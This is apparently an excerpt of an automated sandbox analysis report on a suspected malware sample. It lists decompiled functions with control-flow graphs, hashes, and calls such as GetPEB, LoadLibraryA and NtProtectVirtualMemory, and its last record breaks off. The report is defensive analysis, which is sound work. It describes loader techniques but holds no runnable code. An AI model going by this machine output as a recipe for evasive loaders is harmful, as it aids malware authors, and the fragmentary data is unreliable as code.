                                                                                                                                                                                                                                control_flow_graph 0 166f637-166f7d8 call 166d5d9 * 2 call 16712d1 GetPEB call 167053d 13 166f7de-166f860 call 166f7f1 0->13 14 166ff68-166ff6b 0->14 19 166f866-166f87c 13->19 20 167125b-167125f 13->20 21 1661407-1661419 call 16611c1 19->21 22 166f882-166f8b1 19->22 23 1671260-16712c6 20->23 30 166cd15-166ce9a call 166d535 21->30 31 16613a3-16613c2 21->31 22->21 25 166f8b7-166fa3f 22->25 29 16712c8-16712ca 23->29 37 166fa43-166fa50 25->37 80 166ce9c-166cf73 30->80 31->21 39 166fa56-166fa62 37->39 40 166ff6e-166ff80 37->40 43 1668d15-1668d3a 39->43 44 166fa68-166fa8b 39->44 41 166ff84-166ff91 40->41 47 166ff97-166ffa7 41->47 48 16702c5-16702d2 41->48 45 1668d40-1669291 call 166f637 call 166d5ba call 1670b0b 43->45 46 166d5d9-166d686 43->46 44->37 50 166fa8d-166fa9f 44->50 169 1669297-1669382 call 166d5d9 call 1670b0b call 166a367 45->169 170 166a23c-166a361 call 1670b0b * 3 45->170 57 166d73f-166d742 LoadLibraryA call 166d753 46->57 58 166d68c-166d73d call 166d6ae call 166de34 call 166d753 46->58 47->41 52 166ffa9-167001b 47->52 53 16702d6-1670316 48->53 50->37 55 166faa1-166fab2 50->55 52->43 67 1670021-167002b 52->67 68 1670502-1670534 call 167053d 53->68 69 167031c-1670354 53->69 55->37 63 166fab4-166faf8 55->63 79 166d747-166d74f 57->79 58->57 72 166fafe-166fb25 63->72 73 166146b-166c450 call 16606c3 63->73 67->41 77 1670031-1670062 67->77 68->20 69->53 78 1670356-1670386 69->78 81 166fb27-166fb81 72->81 104 166c452 73->104 105 166c463-166c491 73->105 77->41 85 1670068-16700d0 77->85 78->53 86 167038c-16703ea 78->86 113 166cf79-166cfcc 80->113 97 166fb83-166fbad 81->97 98 166fbaf-166fbeb 81->98 101 16700d2-16700e4 85->101 86->53 102 16703f0-1670416 86->102 106 166fc11-166fc67 97->106 98->106 117 166fbed-166fc10 98->117 110 1670220-1670293 101->110 111 16700ea-1670101 101->111 112 167041b-167046c 102->112 114 166c494-166c573 call 1660538 104->114 105->114 106->46 130 166fc6d-166fc8a 106->130 110->101 127 1670299-16702c2 call 167053d 110->127 121 1670107-16701ad 111->121 122 16701af-1670205 111->122 124 167046e-167048b 112->124 125 167048c-16704fc 112->125 113->21 126 166cfd2-166d077 113->126 157 166c59d-166c5a7 114->157 117->106 121->122 149 1670207-167021f 121->149 122->110 124->125 125->68 125->112 138 166fe04-166fe14 130->138 139 166fc90-166fcbe 130->139 144 166fe1a-166fe31 138->144 145 166fea9-166feba 138->145 139->138 147 166fcc4-166fd42 139->147 144->145 150 166fe33-166fea6 144->150 145->43 151 166fec0-166fee8 145->151 158 166fd44-166fd56 147->158 149->110 150->145 151->81 156 166feee-166ff51 151->156 156->21 166 166ff57-166ff66 call 167053d 156->166 157->46 162 166c5ad-166c5fd call 166abe1 157->162 158->158 163 166fd58-166fd6e 158->163 182 166c587-166c59c 162->182 183 166c5ff-166c634 162->183 163->158 164 166fd70-166fdee 163->164 164->46 174 166fdf4-166fdfd 164->174 166->14 169->21 199 1669388-1669726 call 166d535 call 1670b0b 169->199 170->46 174->158 179 166fe03 174->179 179->138 182->157 186 166c635-166c653 call 166a594 183->186 198 166c655-166c65f 186->198 198->46 199->170 212 166972c-16698c0 199->212 212->46 216 16698c6-1669907 call 1670b0b 212->216 216->170 219 166990d-1669bae call 1670b0b 216->219 219->170 226 1669bb4-1669c0e 219->226 226->43 228 1669c14-1669c29 226->228 228->170 229 1669c2f-1669c60 228->229 230 1669cc5-1669cd7 229->230 231 1669c62-1669cbf 229->231 230->43 233 1669cdd-1669cea 230->233 231->170 231->230 233->170 234 1669cf0-1669e60 233->234 234->46 237 1669e66-1669ee0 call 166db48 234->237 237->170 241 1669ee6-1669fbd call 167125b 237->241 241->170 246 1669fc3-166a0cb call 1670b0b 241->246 246->170 251 166a0d1-166a175 call 1670b0b 246->251 251->170 255 166a17b-166a23b call 1670b0b 251->255 255->46
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoadMemoryProtectVirtual
                                                                                                                                                                                                                                • String ID: ?~6$`\5z$dX.F$C
                                                                                                                                                                                                                                • API String ID: 3389902171-2019787811
                                                                                                                                                                                                                                • Opcode ID: 47345d6d3b2d240adfaae653704b42d7be07d25c6bad724be4a8d4284a1dd95d
                                                                                                                                                                                                                                • Instruction ID: 979c35036b0fbdc193760644225e179958f5ca7a341ce861713dd9cbba173238
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47345d6d3b2d240adfaae653704b42d7be07d25c6bad724be4a8d4284a1dd95d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07D25871604386CFDF359F38CDA87DA7BA6AF56350F45822EDC998B255D3308582CB12
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 01668602 Relevance: 8.0, APIs: 1, Strings: 3, Instructions: 961COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 260 1668602-1668677 GetPEB 262 166867d-16686b0 260->262 263 166887a-166887d 260->263 264 16686b6-166873b 262->264 266 1668741-16687e5 264->266 267 16687ec-1668819 264->267 276 1668d15-1668d3a 266->276 277 16687eb 266->277 269 166881f-1668828 267->269 270 166d5d9-166d686 267->270 269->264 272 166882e-1668878 269->272 274 166d73f-166d74f LoadLibraryA call 166d753 270->274 275 166d68c-166d73d call 166d6ae call 166de34 call 166d753 270->275 272->263 275->274 276->270 280 1668d40-1669291 call 166f637 call 166d5ba call 1670b0b 276->280 277->267 306 1669297-1669382 call 166d5d9 call 1670b0b call 166a367 280->306 307 166a23c-166a361 call 1670b0b * 3 280->307 322 1661407-1661419 call 16611c1 306->322 323 1669388-1669726 call 166d535 call 1670b0b 306->323 307->270 330 166cd15-166ce9a call 166d535 322->330 331 16613a3-16613c2 322->331 323->307 348 166972c-16698c0 323->348 351 166ce9c-166cf73 330->351 331->322 348->270 356 16698c6-1669907 call 1670b0b 348->356 359 166cf79-166cfcc 351->359 356->307 363 166990d-1669bae call 1670b0b 356->363 359->322 362 166cfd2-166d077 359->362 363->307 372 1669bb4-1669c0e 363->372 372->276 374 1669c14-1669c29 372->374 374->307 375 1669c2f-1669c60 374->375 376 1669cc5-1669cd7 375->376 377 1669c62-1669cbf 375->377 376->276 379 1669cdd-1669cea 376->379 377->307 377->376 379->307 380 1669cf0-1669e60 379->380 380->270 383 1669e66-1669ee0 call 166db48 380->383 383->307 387 1669ee6-1669fbd call 167125b 383->387 387->307 392 1669fc3-166a0cb call 1670b0b 387->392 392->307 397 166a0d1-166a175 call 1670b0b 392->397 397->307 401 166a17b-166a23b call 1670b0b 397->401 401->270
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: )IpI$dX.F$C
                                                                                                                                                                                                                                • API String ID: 0-3008493083
                                                                                                                                                                                                                                • Opcode ID: 9b67cb17202624ff87eedd0f31bf1040f66eab2c917cb22583493a83c36ed6cf
                                                                                                                                                                                                                                • Instruction ID: 7b4ff6261b0ffb10e8e1d088d6bd7f77aa569f8c65f1ea57b6bd678d127803d5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b67cb17202624ff87eedd0f31bf1040f66eab2c917cb22583493a83c36ed6cf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D82347160434ACFDB349E78CDA47EA7BA6FF55350F45822EDC8A9B254D3304A86CB42
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0166ACCC Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 226memorynativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 406 166accc-166acdb 407 166af87-166b00b 406->407 408 166ace1-166af2e call 166d5d9 406->408 412 166b011-166b12b call 166d553 call 166b025 407->412 413 167125b-167125f 407->413 426 166af34-166af84 NtAllocateVirtualMemory 408->426 427 166146b-166c450 call 16606c3 408->427 431 166b12c-166b133 412->431 415 1671260-16712c6 413->415 421 16712c8-16712ca 415->421 426->407 434 166c452 427->434 435 166c463-166c491 427->435 431->431 433 166b135-166b142 431->433 436 166b144-166b17f 433->436 437 166b1a3-166b1a8 433->437 438 166c494-166c573 call 1660538 434->438 435->438 439 166b1a9-166b1e8 436->439 437->439 445 166c59d-166c5a7 438->445 439->413 446 166c5ad-166c5fd call 166abe1 445->446 447 166d5d9-166d686 445->447 459 166c587-166c59c 446->459 460 166c5ff-166c634 446->460 450 166d73f-166d742 LoadLibraryA call 166d753 447->450 451 166d68c-166d73d call 166d6ae call 166de34 call 166d753 447->451 458 166d747-166d74f 450->458 451->450 459->445 462 166c635-166c653 call 166a594 460->462 470 166c655-166c65f 462->470 470->447
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0166D5D9: LoadLibraryA.KERNEL32(B2B1C27B,E6BEB875), ref: 0166D73F
                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(-0000000173D1F5F2,?,-6BB0B5A4), ref: 0166AF61
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                                                                                                                                                                • String ID: #4o$M{O$d5z7
                                                                                                                                                                                                                                • API String ID: 2616484454-573927798
                                                                                                                                                                                                                                • Opcode ID: 4e04c6bd9bfc3009842486ffa462f983423fe345d09862f95fae1223a5df4c0f
                                                                                                                                                                                                                                • Instruction ID: ba81a875193222626082a826140ec9052acd82656d05353ce4ecfb6cedeb4068
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e04c6bd9bfc3009842486ffa462f983423fe345d09862f95fae1223a5df4c0f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 417148B22403C59BDB318E688C95BEF7AF69FD6784FA8411EDC499B246E3324943C711
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0166F2C1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 155nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 472 166f2c1-166f2da GetPEB 473 166f2dd-166f341 472->473 475 166f344-166f3a1 473->475 475->473 477 166f3a7-166f3aa 475->477 477->475 478 166f3ac-166f3b0 477->478 478->475 479 166f3b2-166f424 478->479 481 1661407-1661419 call 16611c1 479->481 482 166f42a-166f5b5 call 167125b NtProtectVirtualMemory 479->482 488 166cd15-166ce9a call 166d535 481->488 489 16613a3-16613c2 481->489 492 166f5e3-166f5fb 482->492 502 166ce9c-166cf73 488->502 489->481 492->481 495 166f601-166f622 492->495 506 166cf79-166cfcc 502->506 506->481 508 166cfd2-166d077 506->508
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(21E1D45A,?,?,-2938D17D,?,7D6D90FF,7D6D90FF,?,?), ref: 0166F5AB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                • String ID: ;
                                                                                                                                                                                                                                • API String ID: 2706961497-1661535913
                                                                                                                                                                                                                                • Opcode ID: ded3fc8bedde250aa3a6439810dc9cebc30258fe9e748f19020c41f2a960c275
                                                                                                                                                                                                                                • Instruction ID: a9d8fbdee777da4abe03e6c250b927323ea38e36efe8309a159abe9d031dcd73
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ded3fc8bedde250aa3a6439810dc9cebc30258fe9e748f19020c41f2a960c275
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7451ECB16042458FEF34CE29DC90BDA37B6EF99354F59812ECC499B306C3359A868B01
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0167053D Relevance: 3.1, APIs: 2, Instructions: 99librarynativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(B2B1C27B,E6BEB875), ref: 0166D73F
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(2348C063,?,?,?,?,0166F76E,166B4E76,01668F2E), ref: 0167064F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoadMemoryProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3389902171-0
                                                                                                                                                                                                                                • Opcode ID: a0660e06764b7d2fb85da728abd28d7a6242afb5d65331fca36c53874cff23d3
                                                                                                                                                                                                                                • Instruction ID: 1dc4855b51176ddc4ec5e04a386a035a8d67e32e7f2e3d08f13c9903f6ad32d8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0660e06764b7d2fb85da728abd28d7a6242afb5d65331fca36c53874cff23d3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C631F47174128A9FCF30DEA98C947EA77EAAFA4610F94412AEC4DCB300D7309A41CB11
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F202D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: ae41cd1c9676f55621ed04fc49dd8e482cc7fea15bc7ae6a6e8924cd6bea503d
                                                                                                                                                                                                                                • Instruction ID: 63f2ef8f4e1d42c4f1f15893806582d730692260d7851948cc15afd50a8ee536
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae41cd1c9676f55621ed04fc49dd8e482cc7fea15bc7ae6a6e8924cd6bea503d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4390023120500813D611A158464474B108A47D0241FD2C816B0424918DD6A68953B125
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F202DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 5d42ab61ff93aad12668fc9d045a9a6e7d9ed90b2987fedf2412f58d33ea8901
                                                                                                                                                                                                                                • Instruction ID: 11640b75884037c498d3f6a3a1f203e3771246fed04d35741aa3d7ab413bb5cd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d42ab61ff93aad12668fc9d045a9a6e7d9ed90b2987fedf2412f58d33ea8901
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7490027120500803D640B158454478A108647D0301F92C415B5064914EC6A98DD67669
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F202B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 32101076fbff62721e54ce2912dcf65b02c7f384b48ce69baeb41e9c24983095
                                                                                                                                                                                                                                • Instruction ID: cdc9add453980368c5147b2e6dc9be4cf8e15c523328bf781af9600bc3150687
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32101076fbff62721e54ce2912dcf65b02c7f384b48ce69baeb41e9c24983095
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B90023120500C03D680B158454468E108647D1301FD2C419B0025A14DCA658A5A77A5
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F202B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: a7fc328138e0b1123c3d6f1a3919cfba0d7e536cf480ef0b850c244d01f63c3d
                                                                                                                                                                                                                                • Instruction ID: 6b368b6176604c485db0d328d0cc847c0d3050c5b188e96a4887f57462294381
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7fc328138e0b1123c3d6f1a3919cfba0d7e536cf480ef0b850c244d01f63c3d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE90023120508C03D610A158854478E108647D0301F96C815B4424A18DC6E588927125
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F2034E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: b4350c89dfb695415b713690bfcf36963c76ca9848db68abb5827d799d267069
                                                                                                                                                                                                                                • Instruction ID: 5e47571e78d2eaf800f2b3c614a58329666e8fbfe267416fe43f598e3b4e2798
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4350c89dfb695415b713690bfcf36963c76ca9848db68abb5827d799d267069
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7790023160910803D600A158465474A208647D0201FA2C815B0424928DC7E5895275A6
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0166A367 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(B2B1C27B,E6BEB875), ref: 0166D73F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID: ;!#'
                                                                                                                                                                                                                                • API String ID: 1029625771-608325217
                                                                                                                                                                                                                                • Opcode ID: 1eecd1c317b26a0cd13ea2e9ec85de77255aa5d664e5be2309b90e1679215caf
                                                                                                                                                                                                                                • Instruction ID: 3399c3ec11a020dcc8841d6e16230941a43fd27640880a2bd59fc060abf2c716
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1eecd1c317b26a0cd13ea2e9ec85de77255aa5d664e5be2309b90e1679215caf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 455143D25C83CA66C7119AA85C0EFAB7EF94E97D98F6802CEEC846B147D3172502D731
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0166E098 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 542 166e098-166e09e call 166e40c 545 166e0a0-166e114 542->545 547 166e11a-166e147 545->547 548 166d5d9-166d686 545->548 549 166e149-166e1d9 call 166e31e 547->549 551 166d73f-166d74f LoadLibraryA call 166d753 548->551 552 166d68c-166d73d call 166d6ae call 166de34 call 166d753 548->552 561 166e1e7-166e249 549->561 562 166e1db-166e1e5 549->562 552->551 561->549 566 166e24f-166e25c 561->566 562->561 566->545 568 166e262-166e28e 566->568 568->545 570 166e294-166e300 568->570 570->545 573 166e306-166e310 570->573 573->548 574 166e316-166e317 573->574
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(B2B1C27B,E6BEB875), ref: 0166D73F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID: `
                                                                                                                                                                                                                                • API String ID: 1029625771-1850852036
                                                                                                                                                                                                                                • Opcode ID: 9097eeca33774e1b6c9ee8fa9843052d3f46fd89d15ba33b3fd187016d431124
                                                                                                                                                                                                                                • Instruction ID: 5c1e85fa5e48b294ca7d809847504ff12b23b449b4d05da43799bff44f46e1af
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9097eeca33774e1b6c9ee8fa9843052d3f46fd89d15ba33b3fd187016d431124
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2516971A0038ADFDF349E688D647EB37BBAF65360F44411EDC8AEB201D3354A468B06
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0166D39D Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 593 166d39d-166d3f5 595 166d3f7-166d40c 593->595 596 166d42f-166d492 593->596 595->596 597 166d40e-166d42b 595->597 599 166d498-166d4c1 call 166d553 596->599 600 166d5d9-166d686 596->600 599->600 603 166d73f-166d74f LoadLibraryA call 166d753 600->603 604 166d68c-166d73d call 166d6ae call 166de34 call 166d753 600->604 604->603
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c53a9e6d3058dca37beeabd02d44a48c35e66880a6f017140af95933dd167f22
                                                                                                                                                                                                                                • Instruction ID: da6c242bf073122d92e84313cf9fa5c51ae6524bd7b028bb2ce6f5c5f045c569
